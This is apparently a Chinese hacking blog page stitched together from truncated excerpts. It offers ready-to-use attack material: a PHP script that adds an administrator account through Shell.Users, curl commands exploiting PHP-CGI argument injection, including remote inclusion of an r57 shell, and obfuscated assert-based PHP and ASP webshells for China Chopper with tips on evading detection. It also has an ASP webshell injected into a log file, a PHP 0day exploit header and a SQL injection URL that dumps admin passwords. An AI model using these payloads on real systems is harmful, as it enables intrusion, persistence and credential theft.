网络大学|Network University

Apache+PHP的组合常常会遇到因为管理员是菜逼，而设置Apache为SYSTEM的情况。 但是因为服务器杀软的原因，我们也会遇到经常不能使用net user直接添加账户的情况。 教大家个新方法，虽然几率很小，不过也许会用得上 记得lcx曾经发的代码，可以用vbs调用shell.user然后cscript加脚本创建管理员吗？就是这个原理   <?php echo “<center>Shell.Users组件添加管理员</center>”; $shell = new COM(“Shell.Users”); $cmd = $shell->create(‘silic’); $cmd->changePassword(’13579@silic#’,””); $cmd->setting["AccountType"] = 3; ?>

From:http://www.bkhack.com/vc/306.html //Code by Pnig0s1992      //Date:2012,3,17      #include <stdio.h>      #include <Windows.h>      #include <lm.h>        #pragma comment(lib,”Netapi32.lib”)        int AddUser(LPWSTR lpUsername,LPWSTR lpPassword,LPWSTR lpServerName);      int SetGroup(LPWSTR lpUsername,LPWSTR lpServerName,LPWSTR lpGroupName);      BOOL ImprovePriv(LPWSTR name);        int main(INT …

From:http://www.webshell.cc/3599.html 1、本地包含直接执行代码: curl -H “USER-AGENT: <?system(‘id’);die();?>” http://www.webshell.cc/test.php?-dauto_prepend_file%3d/proc/self/environ+-n 2、远程包含执行代码: curl http://www.webshell.cc/test.php?-dallow_url_include%3don+-dauto_prepend_file%3dhttp://www.webshell.cc/r57.txt

一开始想这样： <?php $_GET['ts7']($_POST['cmd']);?> 客户端用菜刀，密码cmd，url为test.php?ts7=assert 这个应该算没有什么特征码了，但是缺点就是在web日志中会暴露出来assert 可以都用post： <?php $_POST['ts7']($_POST['cmd']);?> 在菜刀说明用<O>ts7=assert</O>post附加数据. 这中间考虑了这些： <?php  $ts7 = (string)key($_POST);  $ts7($_POST[’assert']);  ?> 猛然发现assert这个关键词又出现了。。 既然字符串可以直接这样用，那还可以这样： <?php  $a = “a”.”s”.”s”.”e”.”r”.”t”;  $a($_POST["cmd"]);  ?> 或者用 $a = str_replace(x,””,axsxxsxexrxxt) 以上说来，感觉 <?php $_POST['ts7']($_POST['cmd']);?> 算是最难查到的一种了。 ========================== ywisax 在论坛上又发了这个： 不知是谁写的 百度了一堆 都没写出处，貌似是lcx写的： asp版的，这是utf-8编码，自己看着弄吧 <%@LANGUAGE=”JAVASCRIPT” …

assert在JUNIT单元测试里面是断言的意思，也就是断言结果true or false。但是在PHP里面居然还可以这样玩。 定义一个变量a，然后把x替换掉。相当于$a=assert。assert($_POST["c"]); <?php $a = str_replace(x,””,”axsxxsxexrxxt”); $a($_POST["c"]); ?> 不懂的朋友一起学习下吧，看下一个例子。 <?php $s = 123; assert(“is_int($s)”); ?> 从这个例子可以看到字符串参数会被执行，这跟eval()类似。不过eval($code_str)只是执行符合php编码规范的$code_str。assert的 用法却更详细一点。assert_option()可以用来对assert()的进行一些约束和控制; 菜刀连接一句话连接密码c。

今晚群里朋友叫看个站，有sql防注入，绕不过，但是有发现记录wrong的文件sqlin.asp。 既然做了记录，再查看了下它的记录文件 于是想着构造个asp一句话写进去，前面几种没加密的都失败了，于是写了个加密的 ┼攠數畣整爠煥敵瑳∨≡┩愾           密码 a  (加密方式是: ANSI->Unicode)  提交       and 1= ┼攠數畣整爠煥敵瑳∨≡┩愾 http://www.xxx.cn/sqlin.asp   菜刀连接之，成功   +——————————————————————————————————————————————–+ 其实过程并不难，也没什么技术难度，但是有时遇到这种记录注入错误的网站，多个便捷途径还是不错的。 还有，另外百度了下，发现半坑土农民曾经发现了类似的，但是，额，去他博客看时 , 瀑布汗 

// Exploit Title: PHP 5.4 (5.4.3) Code Execution 0day (Win32) // Exploit author: 0in (Maksymilian Motyl) // Email: 0in(dot)email(at)gmail.com // * Bug with Variant type parsing originally discovered by Condis // Tested on Windows XP SP3 fully patched (Polish) =================== …

微软发布了ms12-032的补丁： http://technet.microsoft.com/en-us/security/bulletin/ms12-032 这个补丁是与TCP/IP协议有关的一个栈溢出问题，可以导致本地提权，目前微软已经要求StackOverflow.com移除这些代码。 老外是这么说的，尝试绑定一个IPV6-mapped IPV4 address，目前只能到crash down1        We discovered that running our application under certain conditions results in Windows bluescreen. After some investigation we were able to narrow down the scenario to a sample of ~50 lines …

Microsoft Windows Windows Vista x64 Edition SP2 Microsoft Windows Windows Vista x64 Edition SP1 Microsoft Windows Windows Vista x64 Edition 0 Microsoft Windows Windows Vista SP2 Microsoft Windows Windows Vista SP1 Microsoft Windows Windows Server 2008 R2 x64 SP Microsoft …

后台地址：admin/Login.asp   数据库路径：inc/db  目录下 漏洞地址： admin/ajax.asp?Act=modeext&cid=1%20and%201=2%20UNION%20select%20111%26Chr(13)%26Chr(10)%26username%26chr(58)%261%26Chr(13)%26Chr(10)%26password%26chr(58)%20from 5u_Admin&id=1%20and%201=2%20UNION%20select%201%20from 5u_Admin 获取后台账号和密码